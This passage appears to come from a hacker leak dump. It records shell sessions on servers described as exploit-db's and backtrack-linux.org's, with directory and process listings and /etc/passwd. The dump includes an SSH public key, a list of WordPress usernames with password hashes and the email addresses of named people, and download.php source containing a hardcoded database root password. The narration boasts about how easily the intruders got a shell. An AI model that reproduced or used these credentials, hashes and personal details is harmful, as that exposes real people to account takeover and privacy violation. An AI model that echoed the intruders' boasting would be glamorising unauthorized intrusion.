of "PermitRootLogin without-password". # If you just want the PAM account and session checks to run without # PAM authentication, then enable this but set PasswordAuthentication # and ChallengeResponseAuthentication to 'no'. UsePAM yes $ cd /home $ ls -la total 12 drwxr-xr-x 3 root root 4096 Aug 3 11:48 . drwxr-xr-x 26 root root 4096 Nov 30 06:53 .. drwxr-xr-x 7 emgent emgent 4096 Aug 7 07:45 emgent $ cd emgent $ ls -la total 48 drwxr-xr-x 7 emgent emgent 4096 Aug 7 07:45 . drwxr-xr-x 3 root root 4096 Aug 3 11:48 .. -rw------- 1 emgent emgent 259 Oct 18 11:39 .bash_history -rw-r--r-- 1 emgent emgent 220 Aug 3 11:48 .bash_logout -rw-r--r-- 1 emgent emgent 3103 Aug 3 11:48 .bashrc drwx------ 2 emgent emgent 4096 Aug 3 11:49 .cache drwx------ 2 emgent emgent 4096 Aug 3 11:49 .irssi -rw------- 1 emgent emgent 9 Aug 3 11:50 .nano_history -rw-r--r-- 1 emgent emgent 675 Aug 3 11:48 .profile drwxr-xr-x 2 emgent emgent 4096 Aug 3 11:49 .ssh drwxr-xr-x 3 emgent emgent 4096 Aug 7 07:45 .subversion drwxr-xr-x 4 emgent emgent 4096 Aug 7 07:46 exploitdb $ cd .ssh $ ls authorized_keys cat authorized_keys ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAntXlep19oECqVocmK6UIhsxI5yGQSPUVYWOZXWO7Q0wP9vF5FfHmE4yCmKt+MleWcPWkkbI6IXBt9TNtw7m6usPx2IEbpEVr8sl7pT8hiW8tKNew74gEEgE53AGLhWr/+vViL+5K4SKCt591oABDtWA6KIEOuyx9/jqLLwBTQP0UyrqIJpR9VhQ2GQ6tN6Y+LV4tvpqy8ehevsIqdj+HvdsvVU2sREJsSH5xAncaRJQ1sfQepyeAwi7yZ1fBT4U4/LlukkBLIqjXk2D6jPZG870R4KCEI280rBJ9DX4fPX9qvYUwOm/OtWwxC7kivuCnNM1v2wBRUVCBmSUimqWnpQ== emgent@enJoy $ ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.0 23680 1244 ? Ss Nov11 0:07 /sbin/init root 2 0.0 0.0 0 0 ? S Nov11 0:00 [kthreadd] root 3 0.0 0.0 0 0 ? S Nov11 0:01 [migration/0] root 4 0.0 0.0 0 0 ? S Nov11 0:12 [ksoftirqd/0] root 5 0.0 0.0 0 0 ? S Nov11 0:00 [watchdog/0] root 6 0.0 0.0 0 0 ? S Nov11 0:02 [migration/1] root 7 0.0 0.0 0 0 ? S Nov11 0:04 [ksoftirqd/1] root 8 0.0 0.0 0 0 ? S Nov11 0:00 [watchdog/1] root 9 0.0 0.0 0 0 ? S Nov11 0:02 [migration/2] root 10 0.0 0.0 0 0 ? S Nov11 0:02 [ksoftirqd/2] root 11 0.0 0.0 0 0 ? S Nov11 0:00 [watchdog/2] root 12 0.0 0.0 0 0 ? S Nov11 0:01 [migration/3] root 13 0.0 0.0 0 0 ? S Nov11 0:05 [ksoftirqd/3] root 14 0.0 0.0 0 0 ? S Nov11 0:00 [watchdog/3] root 15 0.0 0.0 0 0 ? S Nov11 0:32 [events/0] root 16 0.0 0.0 0 0 ? S Nov11 13:44 [events/1] root 17 0.0 0.0 0 0 ? S Nov11 0:17 [events/2] root 18 0.0 0.0 0 0 ? S Nov11 0:18 [events/3] root 19 0.0 0.0 0 0 ? S Nov11 0:00 [cpuset] root 20 0.0 0.0 0 0 ? S Nov11 0:00 [khelper] root 21 0.0 0.0 0 0 ? S Nov11 0:00 [netns] root 22 0.0 0.0 0 0 ? S Nov11 0:00 [async/mgr] root 23 0.0 0.0 0 0 ? S Nov11 0:00 [pm] root 25 0.0 0.0 0 0 ? S Nov11 0:02 [sync_supers] root 26 0.0 0.0 0 0 ? S Nov11 0:04 [bdi-default] root 27 0.0 0.0 0 0 ? S Nov11 0:00 [kintegrityd/0] root 28 0.0 0.0 0 0 ? S Nov11 0:00 [kintegrityd/1] root 29 0.0 0.0 0 0 ? S Nov11 0:00 [kintegrityd/2] root 30 0.0 0.0 0 0 ? S Nov11 0:00 [kintegrityd/3] root 31 0.0 0.0 0 0 ? S Nov11 11:09 [kblockd/0] root 32 0.0 0.0 0 0 ? S Nov11 2:17 [kblockd/1] root 33 0.0 0.0 0 0 ? S Nov11 1:33 [kblockd/2] root 34 0.0 0.0 0 0 ? S Nov11 1:14 [kblockd/3] root 35 0.0 0.0 0 0 ? S Nov11 0:00 [kacpid] root 36 0.0 0.0 0 0 ? S Nov11 0:00 [kacpi_notify] root 37 0.0 0.0 0 0 ? S Nov11 0:00 [kacpi_hotplug] root 38 0.0 0.0 0 0 ? S Nov11 0:00 [ata/0] root 39 0.0 0.0 0 0 ? S Nov11 0:00 [ata/1] root 40 0.0 0.0 0 0 ? S Nov11 0:00 [ata/2] root 41 0.0 0.0 0 0 ? S Nov11 0:00 [ata/3] root 42 0.0 0.0 0 0 ? S Nov11 0:00 [ata_aux] root 43 0.0 0.0 0 0 ? S Nov11 0:00 [ksuspend_usbd] root 44 0.0 0.0 0 0 ? S Nov11 0:00 [khubd] root 45 0.0 0.0 0 0 ? S Nov11 0:00 [kseriod] root 46 0.0 0.0 0 0 ? S Nov11 0:00 [kmmcd] root 51 0.0 0.0 0 0 ? S Nov11 0:00 [khungtaskd] root 52 0.0 0.0 0 0 ? S Nov11 0:30 [kswapd0] root 53 0.0 0.0 0 0 ? SN Nov11 0:00 [ksmd] root 54 0.0 0.0 0 0 ? S Nov11 0:00 [aio/0] root 55 0.0 0.0 0 0 ? S Nov11 0:00 [aio/1] root 56 0.0 0.0 0 0 ? S Nov11 0:00 [aio/2] root 57 0.0 0.0 0 0 ? S Nov11 0:00 [aio/3] root 58 0.0 0.0 0 0 ? S Nov11 0:00 [ecryptfs-kthrea] root 59 0.0 0.0 0 0 ? S Nov11 0:00 [crypto/0] root 60 0.0 0.0 0 0 ? S Nov11 0:00 [crypto/1] root 61 0.0 0.0 0 0 ? S Nov11 0:00 [crypto/2] root 62 0.0 0.0 0 0 ? S Nov11 0:00 [crypto/3] root 65 0.0 0.0 0 0 ? S Nov11 0:00 [pciehpd] root 66 0.0 0.0 0 0 ? S Nov11 0:00 [scsi_eh_0] root 67 0.0 0.0 0 0 ? S Nov11 0:00 [scsi_eh_1] root 69 0.0 0.0 0 0 ? S Nov11 0:00 [kstriped] root 70 0.0 0.0 0 0 ? S Nov11 0:00 [kmpathd/0] root 71 0.0 0.0 0 0 ? S Nov11 0:00 [kmpathd/1] root 72 0.0 0.0 0 0 ? S Nov11 0:00 [kmpathd/2] root 73 0.0 0.0 0 0 ? S Nov11 0:00 [kmpathd/3] root 74 0.0 0.0 0 0 ? S Nov11 0:00 [kmpath_handlerd] root 75 0.0 0.0 0 0 ? S Nov11 0:00 [ksnapd] root 76 0.0 0.0 0 0 ? S Nov11 0:00 [kondemand/0] root 77 0.0 0.0 0 0 ? S Nov11 0:00 [kondemand/1] root 78 0.0 0.0 0 0 ? S Nov11 0:00 [kondemand/2] root 79 0.0 0.0 0 0 ? S Nov11 0:00 [kondemand/3] root 80 0.0 0.0 0 0 ? S Nov11 0:00 [kconservative/0] root 81 0.0 0.0 0 0 ? S Nov11 0:00 [kconservative/1] root 82 0.0 0.0 0 0 ? S Nov11 0:00 [kconservative/2] root 83 0.0 0.0 0 0 ? S Nov11 0:00 [kconservative/3] root 191 0.0 0.0 0 0 ? S Nov11 1:03 [mpt_poll_0] root 192 0.0 0.0 0 0 ? S Nov11 0:00 [mpt/0] root 268 0.0 0.0 0 0 ? S Nov11 0:00 [scsi_eh_2] root 285 0.3 0.0 0 0 ? S Nov11 125:09 [jbd2/sda1-8] root 286 0.0 0.0 0 0 ? S Nov11 0:00 [ext4-dio-unwrit] root 287 0.0 0.0 0 0 ? S Nov11 0:00 [ext4-dio-unwrit] root 288 0.0 0.0 0 0 ? S Nov11 0:00 [ext4-dio-unwrit] root 289 0.0 0.0 0 0 ? S Nov11 0:00 [ext4-dio-unwrit] root 322 0.3 0.0 0 0 ? S Nov11 115:40 [flush-8:0] root 347 0.0 0.0 16904 640 ? S Nov11 0:00 upstart-udev-bridge --daemon root 363 0.0 0.0 16920 416 ? S root 14387 0.0 0.0 0 0 ? Z 15:07 0:00 [firewall-drop.s] www-data 14407 0.4 0.5 354384 32672 ? S 15:07 0:00 /usr/sbin/apache2 -k start www-data 14408 0.1 0.4 352604 29276 ? S 15:07 0:00 /usr/sbin/apache2 -k start www-data 14412 0.3 0.5 354716 32420 ? S 15:08 0:00 /usr/sbin/apache2 -k start www-data 14413 0.4 0.4 352592 29272 ? S 15:08 0:00 /usr/sbin/apache2 -k start www-data 14414 0.2 0.4 352600 28200 ? S 15:08 0:00 /usr/sbin/apache2 -k start www-data 14415 0.3 0.4 352724 29088 ? S 15:08 0:00 /usr/sbin/apache2 -k start www-data 14416 0.2 0.4 353776 29452 ? S 15:08 0:00 /usr/sbin/apache2 -k start www-data 14417 0.2 0.4 353136 28616 ? S 15:08 0:00 /usr/sbin/apache2 -k start www-data 14418 0.3 0.4 353520 29500 ? S 15:08 0:00 /usr/sbin/apache2 -k start www-data 14419 0.7 0.0 0 0 ? Z 15:08 0:00 [apache2] www-data 14420 0.5 0.5 353976 31084 ? S 15:08 0:00 /usr/sbin/apache2 -k start www-data 14421 0.3 0.4 353252 29180 ? S 15:08 0:00 /usr/sbin/apache2 -k start www-data 14422 0.0 0.1 346724 8076 ? S 15:08 0:00 /usr/sbin/apache2 -k start www-data 14423 0.6 0.5 354352 31720 ? S 15:08 0:00 /usr/sbin/apache2 -k start www-data 14424 0.4 0.4 353808 29848 ? S 15:08 0:00 /usr/sbin/apache2 -k start www-data 14425 0.3 0.4 352584 28252 ? S 15:08 0:00 /usr/sbin/apache2 -k start www-data 14426 0.1 0.1 346748 10564 ? S 15:08 0:00 /usr/sbin/apache2 -k start www-data 14427 0.6 0.4 352976 28944 ? S 15:08 0:00 /usr/sbin/apache2 -k start www-data 14428 0.0 0.1 346724 8204 ? S 15:08 0:00 /usr/sbin/apache2 -k start www-data 14429 0.0 0.1 346724 8196 ? S 15:08 0:00 /usr/sbin/apache2 -k start www-data 14430 0.7 0.4 352976 29032 ? S 15:08 0:00 /usr/sbin/apache2 -k start www-data 14431 0.9 0.4 353668 30120 ? S 15:08 0:00 /usr/sbin/apache2 -k start www-data 14432 0.9 0.4 353368 29668 ? S 15:08 0:00 /usr/sbin/apache2 -k start www-data 14433 0.8 0.4 352976 28836 ? S 15:08 0:00 /usr/sbin/apache2 -k start www-data 14435 1.3 0.4 352716 29364 ? S 15:08 0:00 /usr/sbin/apache2 -k start www-data 14436 1.8 0.4 353736 30320 ? S 15:08 0:00 /usr/sbin/apache2 -k start www-data 14437 0.1 0.1 346236 7760 ? S 15:08 0:00 /usr/sbin/apache2 -k start www-data 14438 0.0 0.0 14976 1116 ? R 15:08 0:00 ps aux root 19786 0.0 0.0 107420 1884 ? S Nov16 0:00 /usr/bin/svnserve -d -r /var/svn/ root 19983 0.0 0.0 107420 1940 ? S Nov29 0:00 /usr/bin/svnserve -d -r /var/svn/ root 19989 0.0 0.0 107420 1884 ? S Nov16 0:00 /usr/bin/svnserve -d -r /var/svn/ root 20015 0.0 0.0 107420 1884 ? S Nov16 0:00 /usr/bin/svnserve -d -r /var/svn/ root 20286 0.0 0.0 107420 1888 ? S Nov18 0:00 /usr/bin/svnserve -d -r /var/svn/ mysql 22394 10.4 24.9 2441860 1529604 ? Ssl Nov12 3357:17 /usr/sbin/mysqld $ df -h Filesystem Size Used Avail Use% Mounted on /dev/sda1 48G 17G 29G 37% / none 3.0G 172K 3.0G 1% /dev none 3.0G 0 3.0G 0% /dev/shm none 3.0G 56K 3.0G 1% /var/run none 3.0G 0 3.0G 0% /var/lock none 3.0G 0 3.0G 0% /lib/init/rw none 48G 17G 29G 37% /var/lib/ureadahead/debugfs Wordpress: admin:$P$B./Y8qG9A2YuqIz4uBAjFRo.9Yv0Fb1::muts@offsec.com dookie2000ca:$P$B7YVdu0JG/JOf2YAS8WsmQqHnZHf.b/:dookie2000ca:dookie@exploit-db.com innrwrld:$P$BaJi4YkAt5o/paWUfDMdOOWuqHx/is/:innrwrld:innrwrld@exploit-db.com ivan:$P$B/YVWEkaYIq3s2QLSmVB/wvXWYqoM80::centaur.mail@gmail.com sinn3r:$P$BYzu/ozErhWi8hB8IPFdr6Tv2R9rat/:3r:sinn3r@exploit-db.com loneferret:$P$Bgsl0.nlu4De51qkI8MDoeHDS6iLcM1:loneferret:loneferret@exploit-db.com ronin:$P$BFw9OFuWa1s/t5DUJwKO6A0Otfkewo0::ronin@exploit-db.com dijital1:$P$BirOcybWYDo/Z/wrJ5zBq2zaGElV.f/:dijital1:rlh@ciphermonk.net emgent:$P$BYiha9WKXDzXQm8A8RXboRc7zZuus0.::emgent@backtrack-linux.org j0fer:$P$Bgtsc7w.Vb6mCkJfJi7JkSO5zJUEBY.::j0fer@exploit-db.com ReL1K:$P$B6DyRPNYrBuC.WRv5GrDnFg3wAQPo91::kennedyd013@gmail.com Xpl0it:$P$BGBdVhFBaUM8s9ooGcmB01t.zoK.0V0::mr.xpl0it@gmail.com fdiskyou:$P$BlgwWd3EmVg4SsfIxzOjqUQfGKfLZD0:fdiskyou:rui@exploit-db.com rawjaw:$P$Bovffv59pNKpCOOvKlbGqFOmAh.HKb0::rawjaw@exploit-db.com djokica:$P$BNeyg6NPYJWO9fzjfZs1okvMiM0vq51::centaur@pavko.info xxDigiPxx:$P$B2eEGgTNsZnM4DFpIr4kNrKXv.ivyg/:xxdigipxx:xxtwistedpairxx@comcast.net muts:$P$Bn.MAuG.OlZ1NtTxq0WWAUwhVEfusC.::muts@offensive-security.com Ryujin:$P$BZ75UnhRqkJZj82bWfXbeD6dVxzXTG0::ryujin@offsec.com didn0t:$P$BkGM.gSmmmuDlkJUKjCzy1LfUn9AnS.::paul@pizza.org zelik:$P$BYjCAaqW0tcdNV3MZviRZoN./.HMKn0::tal.zeltzer@gmail.com bitform:$P$BLk7y3.7JTn12lRYj25A/JXJ1W0SIA1::mattgraeber@gmail.com bolexxx:$P$B1liji1bDZoOOwnVwV3Aa59Mqux0FC1::bolexxx@offsec.com h00die:$P$Behl/g/GHQo5zxciUMgjPPzu7ZI8nO/::ragecyr@exploit-db.com MaXe:$P$B6PKmgTlcm5L5kpysXfksmEmRfMy6U.::MaXe@intern0t.net marked_doe:$P$By1rR96ByDsyil/yQa79qBE/A7nbOA1:marked_doe:marc@doudiet.net code0wnz:$P$Bw1OuJHHzMtUBd8oSjmFoQYKtzjaC..:code0wnz:code0wnz@gmail.com Dr_IDE:$P$BR.ReeHZDabreI8G0D5NARv8oY6SOP/::dr_ide@hushmail.com Sud0:$P$BqovGmeqOSCzsHFso9q4goSZ4hkWbK1: :Sud0.x90@gmail.com TecR0c:$P$BXoaJm6vL1VKJWz.K3m1M.XXVoXU9K/::tecr0c@corelan.be kripthor:$P$BpUEGtZ3PvzfYotKDvvRA1AU9U4.iq1:kripthor:umbelino@crazydog.pt ryp:$P$BwQ3FGe9q7spL3vkhxTyYMBkL4UGOQ.::adam@rypmarketing.com fdisk:$P$Blv3X9wG6b/Yo3SDi22/nIJ34t2jGi/::ruifilipe.reis@gmail.com root-boy:$P$BWq8dOxSe/HKG/kE3cXpGyAOgR6F.n1:root-boy:root-boy@exploit-db.com ,_._._._._._._._|____________________________________________________ |_|_|_|_|_|_|_|_|___________________________________________________/ ~ backtrack ~ ! Since we already tapped into exploit-db and their server lies in the same subnet with backtrack, we decided to check out their mad security. Backtrack is run by muts, the same guy who also administers exploit-db, so no wonder why it was super easy to get a shell... $ uname -a Linux backtrack-linux.org 2.6.32.26-175.fc12.x86_64 #1 SMP Wed Dec 1 21:39:34 UTC 2010 x86_64 x86_64 x86_64 GNU/Linux $ id uid=48(apache) gid=494(apache) groups=494(apache) context=unconfined_u:system_r:httpd_t:s0 $ alias ls="ls -la" $ ls total 110 dr-xr-xr-x. 25 root root 4096 Dec 7 08:42 . dr-xr-xr-x. 25 root root 4096 Dec 7 08:42 .. -rw-r--r--. 1 root root 0 Dec 7 08:42 .autofsck drwx------. 2 root root 4096 Dec 10 03:40 backup dr-xr-xr-x. 2 root root 4096 Nov 29 19:59 bin dr-xr-xr-x. 5 root root 1024 Dec 7 08:41 boot drwxr-xr-x. 17 root root 3580 Dec 7 08:43 dev drwxr-xr-x. 66 root root 4096 Dec 7 08:42 etc drwxr-xr-x. 3 root root 4096 Aug 14 20:50 home dr-xr-xr-x. 9 root root 4096 Aug 11 04:01 lib dr-xr-xr-x. 9 root root 12288 Nov 29 20:00 lib64 drwx------. 2 root root 16384 Aug 11 02:01 lost+found drwxr-xr-x. 2 root root 4096 Aug 11 04:42 maint drwxr-xr-x. 2 root root 4096 Aug 25 2009 media drwxr-xr-x. 2 root root 4096 Aug 25 2009 mnt drwxr-xr-x. 2 root root 4096 Aug 25 2009 opt dr-xr-xr-x. 160 root root 0 Dec 7 08:42 proc drwxr-xr-x. 5 root root 4096 Dec 3 17:16 recovery dr-xr-x---. 4 root root 4096 Dec 10 08:50 root dr-xr-xr-x. 2 root root 12288 Nov 29 19:59 sbin drwxr-xr-x. 7 root root 0 Dec 7 08:42 selinux drwxr-xr-x. 2 root root 4096 Aug 25 2009 srv drwxr-xr-x. 13 root root 0 Dec 7 08:42 sys drwxrwxrwt. 4 root root 4096 Dec 10 14:08 tmp drwxr-xr-x. 14 root root 4096 Aug 11 02:03 usr drwxr-xr-x. 20 root root 4096 Aug 14 20:45 var $ cat /etc/issue Fedora release 12 (Constantine) Kernel \r on an \m (\l) $ cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:499:virtual console memory owner:/dev:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin mailnull:x:47:497::/var/spool/mqueue:/sbin/nologin smmsp:x:51:496::/var/spool/mqueue:/sbin/nologin sshd:x:74:495:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin apache:x:48:494:Apache:/var/www:/sbin/nologin mysql:x:27:493:MySQL Server:/var/lib/mysql:/bin/bash ossec:x:500:500::/var/ossec:/sbin/nologin ossecm:x:501:500::/var/ossec:/sbin/nologin ossecr:x:502:500::/var/ossec:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin $ cd /var/www/html/ $ ls total 90224 drwxr-xr-x. 13 apache apache 4096 Dec 9 12:21 . drwxr-xr-x. 6 root root 4096 Aug 18 10:30 .. -rw-r--r--. 1 apache apache 4183 Dec 5 16:50 .htaccess -rw-r--r--. 1 apache apache 1156 Aug 11 03:17 HT -rw-r--r--. 1 apache apache 2233 Aug 11 03:17 HT-ORIG -rw-r--r--. 1 apache apache 1526525 Nov 11 14:01 IMG_0585.JPG drwxr-xr-x. 2 apache apache 4096 Aug 11 03:16 ads -rw-r--r--. 1 apache apache 125832 Nov 19 12:18 bootsplash.jpg -rw-r--r--. 1 apache apache 754444 Aug 11 03:16 bt-nsa.png -rw-r--r--. 1 apache apache 757498 Aug 11 03:16 bt-nsa2.png -rw-r--r--. 1 apache apache 81597 Aug 11 03:16 bt4-final-vm.zip.torrent -rw-r--r--. 1 apache apache 60094 Aug 11 03:16 bt4-final.iso.torrent -rw-r--r--. 1 apache apache 44 Aug 11 03:16 bt4r1.txt -rw-r--r--. 1 root root 686248 Nov 23 10:47 bt4r2.png -rw-r--r--. 1 apache apache 160728 Aug 11 03:16 btfail.png -rw-r--r--. 1 apache apache 476 Aug 11 03:16 collapsible_ad.html -rwxr-xr-x. 1 apache apache 13397784 Aug 11 03:16 d.bin -rw-r--r--. 1 apache apache 121 Aug 11 03:16 d.lic -rw-r--r--. 1 apache apache 12844822 Aug 11 03:16 d32.bin drwxr-xr-x. 2 apache apache 4096 Aug 11 03:16 documents -rw-r--r--. 1 apache apache 3342 Aug 11 03:16 down.php -rw-r--r--. 1 apache apache 4158 Aug 11 03:16 download-orig.php -rw-r--r--. 1 apache apache 4945 Nov 22 11:38 download.php -rw-r--r--. 1 apache apache 15125 Aug 11 03:16 error.php -rw-r--r--. 1 apache apache 137383 Aug 11 03:16 example-2.jpg -rw-r--r--. 1 apache apache 1150 Aug 11 03:16 favicon.ico drwxr-xr-x. 21 apache apache 4096 Nov 22 18:56 forums -rw-r--r--. 1 apache apache 87176 Aug 11 03:17 google.png -rw-r--r--. 1 apache apache 53 Aug 11 03:17 googled6c4817aa45e0032.html -rw-r--r--. 1 apache apache 23 Aug 11 03:17 googlehostedservice.html -rw-r--r--. 1 apache apache 1978856 Sep 17 08:06 hola.jpg -rw-r--r--. 1 apache apache 2264271 Sep 17 08:12 hola1.jpg -rw-r--r--. 1 apache apache 2197361 Sep 17 08:15 hola2.jpg -rw-r--r--. 1 apache apache 315306 Aug 11 03:17 hola22.png -rw-r--r--. 1 apache apache 169202 Aug 11 03:17 hola23.png drwxr-xr-x. 8 apache apache 4096 Nov 21 16:38 images -rw-r--r--. 1 apache apache 3 Aug 11 03:17 index.html -rw-r--r--. 1 apache apache 397 Dec 9 12:20 index.php -rw-r--r--. 1 apache apache 321196 Nov 19 15:06 kanji.png -rw-r--r--. 1 apache apache 147841 Sep 4 12:37 knock-0.5.tar.gz -rw-r--r--. 1 apache apache 15410 Dec 9 12:20 license.txt -rw-r--r--. 1 apache apache 48404480 Nov 14 15:53 mediawiki-1.16.0.tar -rw-r--r--. 1 apache apache 13946 Aug 11 03:17 nv-xorg.conf -rw-r--r--. 1 apache apache 1382400 Oct 26 10:38 oiopub-direct.tar -rw-r--r--. 1 apache apache 1508471 Aug 11 03:17 p2270016.jpg -rw-r--r--. 1 apache apache 1636957 Aug 11 03:17 p2280018.jpg drwxr-xr-x. 2 apache apache 4096 Nov 22 11:46 patches -rw-r--r--. 1 apache apache 582 Nov 22 11:21 r2.php -rw-r--r--. 1 apache apache 9120 Dec 9 12:20 readme.html -rw-r--r--. 1 apache apache 712 Nov 10 22:27 s.php -rw-r--r--. 1 apache apache 63 Aug 11 03:17 show.dud.php -rw-r--r--. 1 apache apache 801 Aug 11 03:17 show.original.php -rw-r--r--. 1 apache apache 31 Aug 11 03:17 show.php -rw-r--r--. 1 apache apache 601 Nov 10 22:28 show.stats.working.php -rw-r--r--. 1 apache apache 38971 Dec 7 23:23 sitemap.xml -rw-r--r--. 1 apache apache 2485 Dec 7 23:23 sitemap.xml.gz drwxr-xr-x. 3 apache apache 4096 Aug 11 03:17 slider -rw-r--r--. 1 apache apache 714372 Aug 11 03:17 spot-the-release.png -rw-r--r--. 1 apache apache 1536 Aug 11 03:17 stats.php -rw-r--r--. 1 apache apache 33 Dec 10 03:34 stats.txt -rw-r--r--. 1 apache apache 23660 Aug 11 03:17 style.css -rw-r--r--. 1 apache apache 5 Aug 11 03:17 test.php drwxr-xr-x. 2 apache apache 4096 Nov 22 09:22 torrents drwxr-xr-x. 15 apache apache 4096 Nov 27 16:52 wiki -rw-r--r--. 1 apache apache 4391 Dec 9 12:20 wp-activate.php drwxr-xr-x. 8 apache apache 4096 Dec 5 08:12 wp-admin -rw-r--r--. 1 apache apache 40284 Dec 9 12:20 wp-app.php -rw-r--r--. 1 apache apache 220 Dec 9 12:20 wp-atom.php -rw-r--r--. 1 apache apache 274 Dec 9 12:20 wp-blog-header.php -rw-r--r--. 1 apache apache 3926 Dec 9 12:20 wp-comments-post.php -rw-r--r--. 1 apache apache 238 Dec 9 12:20 wp-commentsrss2.php -rw-r--r--. 1 apache apache 3173 Dec 9 12:20 wp-config-sample.php -rw-r--r--. 1 apache apache 2696 Nov 22 19:32 wp-config.php drwxr-xr-x. 9 apache apache 4096 Dec 9 12:21 wp-content -rw-r--r--. 1 apache apache 1255 Dec 9 12:20 wp-cron.php -rw-r--r--. 1 apache apache 240 Dec 9 12:20 wp-feed.php drwxr-xr-x. 8 apache apache 4096 Aug 13 20:06 wp-includes -rw-r--r--. 1 apache apache 2002 Dec 9 12:20 wp-links-opml.php -rw-r--r--. 1 apache apache 2441 Dec 9 12:20 wp-load.php -rw-r--r--. 1 apache apache 26059 Dec 9 12:20 wp-login.php -rw-r--r--. 1 apache apache 7774 Dec 9 12:20 wp-mail.php -rw-r--r--. 1 apache apache 487 Dec 9 12:20 wp-pass.php -rw-r--r--. 1 apache apache 218 Dec 9 12:20 wp-rdf.php -rw-r--r--. 1 apache apache 316 Dec 9 12:20 wp-register.php -rw-r--r--. 1 apache apache 218 Dec 9 12:20 wp-rss.php -rw-r--r--. 1 apache apache 220 Dec 9 12:20 wp-rss2.php -rw-r--r--. 1 apache apache 9177 Dec 9 12:20 wp-settings.php -rw-r--r--. 1 apache apache 18695 Dec 9 12:20 wp-signup.php -rw-r--r--. 1 apache apache 3702 Dec 9 12:20 wp-trackback.php -rw-r--r--. 1 root root 99665 Nov 24 00:52 wtfff.png -rw-r--r--. 1 apache apache 85 Nov 20 13:43 x.gif -rw-r--r--. 1 apache apache 95481 Dec 9 12:20 xmlrpc.php $ cat wp-config.php $ cat stats.txt BackTrack 4 - 4916323 downloads cat download.php EVEN IF YOU THINK YOU KNOW WHAT YOU ARE DOING!!! function getRealIpAddr() { if (!empty($_SERVER['HTTP_CLIENT_IP'])) //check ip from share internet { $ip=$_SERVER['HTTP_CLIENT_IP']; } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) //to check ip is pass from proxy { $ip=$_SERVER['HTTP_X_FORWARDED_FOR']; } else { $ip=$_SERVER['REMOTE_ADDR']; } return $ip; } $ip=getRealIpAddr(); $username="root"; $password="234hi2u3d98as7d23kuh"; $database="counter"; function choose($iso) { $num = Rand (1,5); switch ($num) { case 1: $link="ftp://ftp.uio.no/pub/security/backtrack/$iso"; break; case 2: $link="http://ftp.uio.no/pub/security/backtrack/$iso"; break; case 3: $link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso"; break; case 4: $link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso"; break; case 5: $link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso"; break; // case 6: // $link="http://moon.backtrack-linux.org/downloads/$iso"; // break; } return $link; } $version=$_GET["fname"]; if (! (($version=="bt4f") or ($version=="bt4fvm") or ($version=="bt4r1") or ($version=="bt4r1vm") or ($version=="bt3") or ($version=="bt4pf") or ($version=="bt4b") or ($version=="bt4bvm") or ($version=="bt4r2") or ($version=="bt4r2vm"))) { echo "This page cannot be accessed directly."; exit; } if ($version=="bt4r2") { $iso="bt4-r2.iso"; $link=choose($iso); mysql_connect("localhost",$username,$password); @mysql_select_db($database) or die( "Unable to select database"); $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; mysql_query($query); mysql_close(); header( "Location: $link "); exit; } if ($version=="bt4r2vm") { $iso="bt4-r2-vm.tar.bz2"; $link=choose($iso); mysql_connect("localhost",$username,$password); @mysql_select_db($database) or die( "Unable to select database"); $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; mysql_query($query); mysql_close(); header( "Location: $link "); exit; } if ($version=="bt4f") { $iso="bt4-final.iso"; $link=choose($iso); mysql_connect("localhost",$username,$password); @mysql_select_db($database) or die( "Unable to select database"); $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; mysql_query($query); mysql_close(); header( "Location: $link "); exit; } elseif ($version=="bt4fvm") { $iso="bt4-final-vm.zip"; $link=choose($iso); mysql_connect("localhost",$username,$password); @mysql_select_db($database) or die( "Unable to select database"); $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; mysql_query($query); mysql_close(); header( "Location: $link "); exit; } elseif ($version=="bt4r1") { $iso="bt4-r1.iso"; $link=choose($iso); mysql_connect("localhost",$username,$password); @mysql_select_db($database) or die( "Unable to select database"); $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; mysql_query($query); mysql_close(); header( "Location: $link "); exit; } elseif ($version=="bt4r1vm") { $iso="bt4-r1-vm.tar.bz2"; $link=choose($iso); mysql_connect("localhost",$username,$password); @mysql_select_db($database) or die( "Unable to select database"); $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; mysql_query($query); mysql_close(); header( "Location: $link "); exit; } elseif ($version=="bt4pf") { $iso="bt4-pre-final.iso"; $link=choose($iso); mysql_connect("localhost",$username,$password); @mysql_select_db($database) or die( "Unable to select database"); $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; mysql_query($query); mysql_close(); header( "Location: $link "); exit; } elseif ($version=="bt4b") { $iso="bt4-beta.iso"; $link=choose($iso); mysql_connect("localhost",$username,$password); @mysql_select_db($database) or die( "Unable to select database"); $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; mysql_query($query); mysql_close(); header( "Location: $link "); exit; } elseif ($version=="bt4bvm") { $iso="bt4-beta-vm-6.5.1.rar"; $link=choose($iso); mysql_connect("localhost",$username,$password); @mysql_select_db($database) or die( "Unable to select database"); $query = "INSERT INTO downloadss VALUES 